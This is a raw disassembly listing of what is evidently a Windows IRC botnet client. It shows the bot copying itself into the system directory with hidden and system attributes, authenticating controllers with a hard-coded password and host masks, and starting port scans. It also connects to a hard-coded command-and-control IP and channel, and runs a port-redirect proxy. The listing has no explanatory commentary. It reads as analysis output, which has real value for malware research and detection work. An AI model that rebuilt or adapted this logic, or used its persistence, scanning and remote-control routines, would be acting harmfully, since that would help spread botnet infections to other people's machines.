movsx ecx, byte ptr [ebp+arg_0+3]
cmp ecx, esi
jl short loc_40CE16
loc_40CE38: ; CODE XREF: sub_4078FA+551A�j
; sub_4078FA+551E�j
mov [ebp+var_4B8], 1
jmp short loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CE44: ; CODE XREF: sub_4078FA+54F3�j
mov [ebp+var_4B8], edi
loc_40CE4A: ; CODE XREF: sub_4078FA+5415�j
; sub_4078FA+5548�j
mov eax, [ebp+arg_4]
push [ebp+var_9C]
mov [ebp+var_4E8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4C0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4BC], eax
mov esi, 80h
lea eax, [ebp+var_5E8]
push esi
push eax
call sub_412E0D
mov ebx, [ebp+ebx+var_8C]
add esp, 0Ch
cmp ebx, edi
jz short loc_40CE9E
push ebx
loc_40CE8C: ; CODE XREF: sub_4078FA+55B4�j
push esi
loc_40CE8D: ; CODE XREF: sub_4078FA+55D1�j
lea eax, [ebp+var_568]
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40CED4
; ---------------------------------------------------------------------------
loc_40CE9E: ; CODE XREF: sub_4078FA+558F�j
mov eax, [ebp+var_AC]
cmp eax, edi
jz short loc_40CEB0
cmp byte ptr [eax], 23h
jnz short loc_40CEB0
push eax
jmp short loc_40CE8C
; ---------------------------------------------------------------------------
loc_40CEB0: ; CODE XREF: sub_4078FA+55AC�j
; sub_4078FA+55B1�j
xor ecx, ecx
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 41FA76h
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40CECD
push eax
push 80h
jmp short loc_40CE8D
; ---------------------------------------------------------------------------
loc_40CECD: ; CODE XREF: sub_4078FA+55C9�j
and [ebp+var_568], 0
loc_40CED4: ; CODE XREF: sub_4078FA+55A2�j
xor esi, esi
cmp [ebp+var_4B8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40CEE8
mov eax, offset aSequential ; "Sequential"
loc_40CEE8: ; CODE XREF: sub_4078FA+55E7�j
push [ebp+var_4CC]
lea ecx, [ebp+var_67C]
push [ebp+var_4DC]
push [ebp+var_4E0]
push [ebp+var_4E4]
push ecx
push eax
lea eax, [ebp+var_2E0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 9
push eax
call sub_410EEA
add esp, 2Ch
mov [ebp+var_4D8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_67C]
push eax
push offset sub_4018D1
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_4D8]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40CF88
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
loc_40CF6C: ; CODE XREF: sub_4078FA+50D7�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40CA03
; ---------------------------------------------------------------------------
loc_40CF80: ; CODE XREF: sub_4078FA+5694�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40CF88: ; CODE XREF: sub_4078FA+5664�j
cmp [ebp+var_4B4], esi
jz short loc_40CF80
jmp loc_40CA03
; ---------------------------------------------------------------------------
loc_40CF95: ; CODE XREF: sub_4078FA+D27�j
; sub_4078FA+D3B�j
push [ebp+ebx+var_A0]
xor eax, eax
cmp [ebp+var_43C], al
setnz al
push eax
push dword_42AE64
lea eax, [ebp+var_3AC]
push eax
call sub_40E7B0
lea eax, [ebp+var_3AC]
push eax
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_3AC]
push eax
push offset aMainRandomNick ; "[MAIN]: Random nick change: %s"
call sub_401CA7
loc_40CFDF: ; CODE XREF: sub_4078FA+4DC5�j
add esp, 24h
loc_40CFE2: ; CODE XREF: sub_4078FA+73B�j
; sub_4078FA+747�j ...
mov eax, [ebp+arg_24]
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40CFEA: ; CODE XREF: sub_4078FA+7C8�j
; sub_4078FA+7DC�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
mov [ebp+var_8], ebx
jz loc_407B7B
cmp [ebp+var_20], 0
jnz loc_407B7B
push offset asc_4264C0 ; "!"
push [ebp+var_A4]
call sub_413859
mov esi, eax
push offset dword_424824
push 0
inc esi
call sub_413859
push offset asc_424820 ; "~"
push eax
call sub_413859
mov edi, [ebp+var_8]
mov ebx, eax
add esp, 18h
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40D03D: ; CODE XREF: sub_4078FA+575F�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_40D05F
test cl, cl
jz short loc_40D05B
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_40D05F
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_40D03D
loc_40D05B: ; CODE XREF: sub_4078FA+574D�j
xor eax, eax
jmp short loc_40D064
; ---------------------------------------------------------------------------
loc_40D05F: ; CODE XREF: sub_4078FA+5749�j
; sub_4078FA+5757�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40D064: ; CODE XREF: sub_4078FA+5763�j
test eax, eax
jz short loc_40D0B3
push ebx
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_404592
push ebx
push esi
push offset aMainFailedPass ; "[MAIN]: *Failed pass auth by: (%s!%s)."
loc_40D09F: ; CODE XREF: sub_4078FA+580C�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 30h
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_40D0B3: ; CODE XREF: sub_4078FA+576C�j
xor edi, edi
loc_40D0B5: ; CODE XREF: sub_4078FA+57D3�j
push ebx
push off_42AF3C[edi]
call sub_4115E8
test eax, eax
pop ecx
pop ecx
jnz short loc_40D108
add edi, 4
cmp edi, 4
jb short loc_40D0B5
push ebx
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_404592
push ebx
push esi
push offset aMainFailedHost ; "[MAIN]: *Failed host auth by: (%s!%s)."
jmp short loc_40D09F
; ---------------------------------------------------------------------------
loc_40D108: ; CODE XREF: sub_4078FA+57CB�j
mov edx, [ebp+arg_18]
xor eax, eax
loc_40D10D: ; CODE XREF: sub_4078FA+5855�j
cmp byte ptr [edx], 0
jnz short loc_40D145
mov edi, [ebp+var_8]
mov esi, offset aN3m3s1s ; "n3m3s1s"
loc_40D11A: ; CODE XREF: sub_4078FA+583C�j
mov bl, [esi]
mov cl, bl
cmp bl, [edi]
jnz short loc_40D13C
test cl, cl
jz short loc_40D138
mov bl, [esi+1]
mov cl, bl
cmp bl, [edi+1]
jnz short loc_40D13C
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_40D11A
loc_40D138: ; CODE XREF: sub_4078FA+582A�j
xor ecx, ecx
jmp short loc_40D141
; ---------------------------------------------------------------------------
loc_40D13C: ; CODE XREF: sub_4078FA+5826�j
; sub_4078FA+5834�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_40D141: ; CODE XREF: sub_4078FA+5840�j
test ecx, ecx
jz short loc_40D156
loc_40D145: ; CODE XREF: sub_4078FA+5816�j
inc eax
add edx, 80h
cmp eax, 2
jl short loc_40D10D
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40D156: ; CODE XREF: sub_4078FA+5849�j
shl eax, 7
add eax, [ebp+arg_18]
push 7Fh
lea ecx, [ebp+var_C04]
push ecx
push eax
call sub_412C40
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40D18F
push 0
push [ebp+var_4]
push offset aMainPasswordAc ; "[MAIN]: Password accepted."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40D18F: ; CODE XREF: sub_4078FA+5878�j
lea eax, [ebp+var_E0]
push eax
push offset aMainUserSLog_1 ; "[MAIN]: User: %s logged in."
loc_40D19B: ; CODE XREF: sub_4078FA+6F8�j
; sub_4078FA+45F8�j ...
call sub_401CA7
pop ecx
loc_40D1A1: ; CODE XREF: sub_4078FA+32FC�j
pop ecx
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40D1A7: ; CODE XREF: sub_4078FA+1FD�j
; sub_4078FA+210�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_404592
push offset aIx ; "+ix"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_404592
xor eax, eax
add esp, 2Ch
inc eax
mov dword_479BB8, eax
jmp loc_407B7E
sub_4078FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D1EF proc near ; CODE XREF: .text:00414AA6�p
var_98C = byte ptr -98Ch
var_888 = byte ptr -888h
var_887 = byte ptr -887h
var_6F8 = byte ptr -6F8h
var_5F8 = byte ptr -5F8h
var_4F8 = byte ptr -4F8h
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_1EC = byte ptr -1ECh
var_E8 = byte ptr -0E8h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98Ch
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_402795
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_41F004
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_479BB0, eax
call esi ; GetTickCount
push eax
call sub_412D64
pop ecx
call sub_40468E
push 2
call dword_433478
push 7530h
push offset aBot018 ; "Bot018"
push ebx
push ebx
call ds:dword_41F0DC ; CreateMutexA
push eax
call ds:dword_41F0D8 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40D26E
push 1
jmp loc_40D4CE
; ---------------------------------------------------------------------------
loc_40D26E: ; CODE XREF: sub_40D1EF+76�j
lea eax, [ebp+var_888]
push eax
push 202h
call dword_4334B0
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_40D73B
cmp [ebp+var_888], 2
jnz loc_40D735
cmp [ebp+var_887], 2
jnz loc_40D735
mov esi, 104h
push esi
lea eax, [ebp+var_3F4]
push eax
call ds:dword_41F040 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_2F0]
push eax
push ebx
call ds:dword_41F078 ; GetModuleHandleA
push eax
call ds:dword_41F010 ; GetModuleFileNameA
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push ebx
lea eax, [ebp+var_2F0]
push ebx
push eax
call sub_4141AD
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_4F8]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_413920
add esp, 30h
test eax, eax
jnz loc_40D4D4
cmp dword_42AE54, ebx
mov esi, offset byte_42AED0
jz short loc_40D376
mov eax, esi
xor edi, edi
lea ecx, [eax+1]
loc_40D33C: ; CODE XREF: sub_40D1EF+152�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40D33C
sub eax, ecx
add eax, 0FFFFFFFAh
test eax, eax
jbe short loc_40D376
loc_40D34C: ; CODE XREF: sub_40D1EF+185�j
call sub_412D71
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, esi
lea ecx, [eax+1]
add dl, 61h
mov byte_42AED0[edi], dl
inc edi
loc_40D366: ; CODE XREF: sub_40D1EF+17C�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40D366
sub eax, ecx
add eax, 0FFFFFFFAh
cmp edi, eax
jb short loc_40D34C
loc_40D376: ; CODE XREF: sub_40D1EF+144�j
; sub_40D1EF+15B�j
push esi
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_1EC]
push offset aSS_5 ; "%s\\%s"
push eax
call sub_412BB5
add esp, 10h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F06C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40D3B6
push 80h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F0A0 ; SetFileAttributesA
loc_40D3B6: ; CODE XREF: sub_40D1EF+1B3�j
mov esi, ds:dword_41F000
push 7D0h
call esi ; Sleep
mov edi, ds:dword_41F0D4
mov [ebp+var_4], ebx
jmp short loc_40D3F1
; ---------------------------------------------------------------------------
loc_40D3CE: ; CODE XREF: sub_40D1EF+215�j
call ds:dword_41F008 ; RtlGetLastWin32Error
cmp [ebp+var_4], ebx
jnz short loc_40D406
cmp eax, 20h
jz short loc_40D3E3
cmp eax, 5
jnz short loc_40D406
loc_40D3E3: ; CODE XREF: sub_40D1EF+1ED�j
push 3A98h
mov [ebp+var_4], 1
call esi ; Sleep
loc_40D3F1: ; CODE XREF: sub_40D1EF+1DD�j
push ebx
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_2F0]
push eax
call edi ; CopyFileA
test eax, eax
jz short loc_40D3CE
loc_40D406: ; CODE XREF: sub_40D1EF+1E8�j
; sub_40D1EF+1F2�j
lea eax, [ebp+var_1EC]
push eax
call sub_40584F
pop ecx
push 7
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F0A0 ; SetFileAttributesA
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
xor edi, edi
inc edi
mov [ebp+var_5C], 41FA76h
mov [ebp+var_68], 44h
mov [ebp+var_3C], edi
mov [ebp+var_38], bx
call ds:dword_41F0D0 ; GetCurrentProcessId
push eax
push edi
push 100000h
call ds:dword_41F0C4 ; OpenProcess
lea ecx, [ebp+var_2F0]
push ecx
push eax
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_98C]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_412BB5
add esp, 14h
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_3F4]
push eax
push ebx
push 28h
push edi
push ebx
push ebx
lea eax, [ebp+var_98C]
push eax
lea eax, [ebp+var_1EC]
push eax
call ds:dword_41F030 ; CreateProcessA
test eax, eax
jz short loc_40D4DA
push 0C8h
call esi ; Sleep
push [ebp+var_24]
mov esi, ds:dword_41F034
call esi ; CloseHandle
push [ebp+var_20]
call esi ; CloseHandle
call dword_4335B8
push ebx
loc_40D4CE: ; CODE XREF: sub_40D1EF+7A�j
call ds:dword_41F02C ; ExitProcess
loc_40D4D4: ; CODE XREF: sub_40D1EF+133�j
mov esi, ds:dword_41F000
loc_40D4DA: ; CODE XREF: sub_40D1EF+2BF�j
cmp dword_479E70, 2
jle short loc_40D522
mov eax, dword_479E74
push dword ptr [eax+4]
call sub_412F42
pop ecx
mov edi, eax
push 0FFFFFFFFh
push edi
call ds:dword_41F0D8 ; WaitForSingleObject
push edi
call ds:dword_41F034 ; CloseHandle
mov eax, dword_479E74
cmp [eax+8], ebx
jz short loc_40D522
push 7D0h
call esi ; Sleep
mov eax, dword_479E74
push dword ptr [eax+8]
call ds:dword_41F0B8 ; DeleteFileA
loc_40D522: ; CODE XREF: sub_40D1EF+2F2�j
; sub_40D1EF+31C�j
cmp dword_42AE58, ebx
jz short loc_40D53F
cmp dword_433600, ebx
jnz short loc_40D53F
lea eax, [ebp+var_4F8]
push eax
call sub_401E73
pop ecx
loc_40D53F: ; CODE XREF: sub_40D1EF+339�j
; sub_40D1EF+341�j
lea eax, [ebp+var_E8]
push offset aMainBotStarted ; "[MAIN]: Bot started."
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_E8]
push ebx
push eax
call sub_410EEA
lea eax, [ebp+var_E8]
push eax
call sub_401C33
xor eax, eax
mov ecx, 2E0h
mov edi, offset dword_479030
rep stosd
lea eax, [ebp+var_E8]
push offset aSecureSystemSe ; "[SECURE]: System secure monitor active."...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+var_E8]
push 1Ah
push eax
call sub_410EEA
add esp, 2Ch
mov edi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push ebx
push offset sub_40F005
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_43434C[edi], eax
jnz short loc_40D5DB
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_E8]
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
push eax
call sub_412BB5
add esp, 0Ch
loc_40D5DB: ; CODE XREF: sub_40D1EF+3CF�j
lea eax, [ebp+var_E8]
push eax
call sub_401C33
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push offset dword_478ECC
mov dword_479BBC, ebx
call sub_412C40
mov eax, dword_42AE38
push 3Fh
push offset aHell ; "#hell"
mov esi, offset dword_478F4C
push esi
mov dword_47901C, eax
call sub_412C40
push 3Fh
push offset aTroopers ; "troopers"
mov edi, offset dword_478F8C
push edi
call sub_412C40
add esp, 28h
mov dword_479020, ebx
loc_40D635: ; CODE XREF: sub_40D1EF+4EC�j
; sub_40D1EF+4F7�j ...
mov [ebp+var_4], ebx
loc_40D638: ; CODE XREF: sub_40D1EF+4A0�j
cmp dword_433618, ebx
jnz short loc_40D656
push ebx
lea eax, [ebp+var_14]
push eax
call dword_433428
test eax, eax
jnz short loc_40D656
push 7530h
jmp short loc_40D682
; ---------------------------------------------------------------------------
loc_40D656: ; CODE XREF: sub_40D1EF+44F�j
; sub_40D1EF+45E�j
push offset dword_478EC8
mov dword_479BB8, ebx
call sub_40779B
cmp eax, 2
mov [ebp+var_8], eax
jz loc_40D730
cmp dword_479BB8, ebx
jz short loc_40D67D
dec [ebp+var_4]
loc_40D67D: ; CODE XREF: sub_40D1EF+489�j
push 0BB8h
loc_40D682: ; CODE XREF: sub_40D1EF+465�j
call ds:dword_41F000 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 3
jl short loc_40D638
cmp [ebp+var_8], 2
jz loc_40D730
cmp [ebp+var_C], ebx
jz short loc_40D6E0
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push offset dword_478ECC
call sub_412C40
mov eax, dword_42AE38
push 3Fh
push offset aHell ; "#hell"
push esi
mov dword_47901C, eax
call sub_412C40
push 3Fh
push offset aTroopers ; "troopers"
push edi
call sub_412C40
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_40D635
; ---------------------------------------------------------------------------
loc_40D6E0: ; CODE XREF: sub_40D1EF+4AF�j
cmp byte_42AEAC, bl
jz loc_40D635
push 7Fh
push offset byte_42AEAC
push offset dword_478ECC
call sub_412C40
mov eax, dword_42AE3C
push 3Fh
push offset dword_42AEBC
push esi
mov dword_47901C, eax
call sub_412C40
push 3Fh
push offset aTroopers_0 ; "troopers"
push edi
call sub_412C40
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40D635
; ---------------------------------------------------------------------------
loc_40D730: ; CODE XREF: sub_40D1EF+47D�j
; sub_40D1EF+4A6�j
call sub_41105B
loc_40D735: ; CODE XREF: sub_40D1EF+A3�j
; sub_40D1EF+B0�j
call dword_4335B8
loc_40D73B: ; CODE XREF: sub_40D1EF+96�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40D1EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40D744 proc near ; DATA XREF: sub_40D7DF+12C�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov ebx, 1000h
jmp short loc_40D799
; ---------------------------------------------------------------------------
loc_40D77E: ; CODE XREF: sub_40D744+7B�j
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_434344[esi]
call dword_433534
cmp eax, 0FFFFFFFFh
jz short loc_40D7C1
loc_40D799: ; CODE XREF: sub_40D744+38�j
xor eax, eax
push eax
lea edi, [ebp+var_1128]
mov ecx, 400h
rep stosd
push ebx
lea eax, [ebp+var_1128]
push eax
push dword_434348[esi]
call dword_433414
test eax, eax
jg short loc_40D77E
loc_40D7C1: ; CODE XREF: sub_40D744+53�j
push dword_434348[esi]
call dword_4335AC
push [ebp+var_14]
call sub_4111AE
pop ecx
push 0
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40D744 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40D7DF proc near ; DATA XREF: sub_40D9BC+118�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_412DD0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_144]
rep movsd
mov esi, [ebp+var_30]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+var_4], esi
call dword_4334A0
xor ebx, ebx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_40D93E
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
mov [ebp+var_18], 2
call dword_4335EC
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_433514
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40D867
lea eax, [ebp+var_13C]
push eax
call dword_433500
jmp short loc_40D875
; ---------------------------------------------------------------------------
loc_40D867: ; CODE XREF: sub_40D7DF+77�j
push 2
push 4
lea eax, [ebp+var_8]
push eax
call dword_433590
loc_40D875: ; CODE XREF: sub_40D7DF+86�j
cmp eax, ebx
jz loc_40D93E
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
push 10h
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call dword_433458
cmp eax, 0FFFFFFFFh
jz loc_40D93E
push [ebp+var_34]
movzx eax, [ebp+var_16]
push eax
push [ebp+var_14]
mov [ebp+var_20], ebx
call dword_433520
push eax
lea eax, [ebp+var_344]
push offset aRedirectClient ; "[REDIRECT]: Client connection to IP: %s"...
push eax
call sub_412BB5
push [ebp+arg_0]
lea eax, [ebp+var_344]
push 11h
push eax
call sub_410EEA
imul esi, 234h
mov ecx, [ebp+var_34]
mov [ebp+var_30], eax
imul eax, 234h
mov dword_43433C[eax], ecx
add esp, 20h
lea esi, dword_434344[esi]
mov ecx, [esi]
mov dword_434348[eax], ecx
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_144]
push eax
push offset sub_40D744
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_40D974
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_0 ; "[REDIRECT]: Failed to start connection "...
call sub_401CA7
pop ecx
pop ecx
loc_40D93E: ; CODE XREF: sub_40D7DF+42�j
; sub_40D7DF+98�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_434344[eax]
call dword_4335AC
push [ebp+arg_0]
call dword_4335AC
push [ebp+var_4]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
loc_40D96C: ; CODE XREF: sub_40D7DF+198�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40D974: ; CODE XREF: sub_40D7DF+14A�j
cmp [ebp+var_20], ebx
jz short loc_40D96C
jmp short loc_40D992
; ---------------------------------------------------------------------------
loc_40D97B: ; CODE XREF: sub_40D7DF+1D9�j
push ebx
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_433534
cmp eax, 0FFFFFFFFh
jz short loc_40D93E
loc_40D992: ; CODE XREF: sub_40D7DF+19A�j
xor eax, eax
push ebx
lea edi, [ebp+var_1344]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+var_1344]
push eax
push dword ptr [esi]
call dword_433414
cmp eax, ebx
jg short loc_40D97B
jmp short loc_40D93E
sub_40D7DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D9BC proc near ; DATA XREF: sub_4078FA+26DC�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 4Ah
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push [ebp+var_40]
xor esi, esi
inc esi
mov [eax+120h], esi
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_4335EC
push 6
push esi
xor ebx, ebx
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], ebx
mov [ebp+arg_0], 10h
call dword_4334A0
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_40DB1B
mov eax, [ebp+var_3C]
imul eax, 234h
push esi
push 401h
push ebx
push edi
mov dword_434344[eax], edi
call dword_43352C
push 10h
lea eax, [ebp+var_10]
push eax
push edi
call dword_433578
test eax, eax
jnz loc_40DB1B
push 0Ah
push edi
call dword_4335C0
test eax, eax
jnz loc_40DB1B
loc_40DA62: ; CODE XREF: sub_40D9BC+BA�j
; sub_40D9BC+15A�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_433464
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40DA62
push [ebp+var_3C]
movzx eax, [ebp+var_22]
push eax
push [ebp+var_20]
mov [ebp+var_148], esi
mov [ebp+var_2C], ebx
call dword_433520
push eax
lea eax, [ebp+var_34C]
push offset aRedirectClie_0 ; "[REDIRECT]: Client connection from IP: "...
push eax
call sub_412BB5
push esi
lea eax, [ebp+var_34C]
push 11h
push eax
call sub_410EEA
mov ecx, [ebp+var_3C]
mov [ebp+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_43433C[eax], ecx
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_14C]
push eax
push offset sub_40D7DF
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_40DB11
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_1 ; "[REDIRECT]: Failed to start client thre"...
call sub_401CA7
pop ecx
pop ecx
jmp short loc_40DB1E
; ---------------------------------------------------------------------------
loc_40DB09: ; CODE XREF: sub_40D9BC+158�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40DB11: ; CODE XREF: sub_40D9BC+136�j
cmp [ebp+var_2C], ebx
jz short loc_40DB09
jmp loc_40DA62
; ---------------------------------------------------------------------------
loc_40DB1B: ; CODE XREF: sub_40D9BC+5D�j
; sub_40D9BC+8F�j ...
mov esi, [ebp+arg_0]
loc_40DB1E: ; CODE XREF: sub_40D9BC+14B�j
push esi
call dword_4335AC
push edi
call dword_4335AC
push [ebp+var_3C]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40D9BC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DB3D proc near ; CODE XREF: sub_40DB6D+30�p
; sub_40DBAB+85�p ...
mov eax, dword_479BCC
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_41F034
jz short loc_40DB51
push eax
call esi ; CloseHandle
